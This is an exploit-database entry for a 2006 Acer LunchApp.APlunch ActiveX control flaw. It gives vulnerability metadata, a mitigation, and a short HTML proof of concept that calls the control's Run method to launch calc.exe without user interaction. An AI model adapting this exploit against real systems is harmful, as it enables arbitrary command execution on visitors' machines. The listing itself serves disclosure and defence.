header-logo
Suggest Exploit
vendor:
Notebook LunchApp.APlunch
by:
Tan Chew Keong
9.3
CVSS
HIGH
ActiveX Control Command Execution
95
CWE
Product Name: Notebook LunchApp.APlunch
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2006

Acer Notebook LunchApp.APlunch ActiveX Control Command Execution Exploit

This exploit uses the Run method of the LunchApp.APlunch ActiveX control to execute arbitrary commands. The control is marked as safe for scripting, so no user interaction is required to exploit this vulnerability.

Mitigation:

Disable the LunchApp.APlunch ActiveX control in the browser or remove it from the system.
Source

Exploit-DB raw data:

<!--
Author: Tan Chew Keong 
Site: http://vuln.sg/
Acer Notebook LunchApp.APlunch ActiveX Control Command Execution Exploit
-->

<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</html>
</body>

# milw0rm.com [2006-11-30]

Navigation

Suggest Exploit

Services By CQR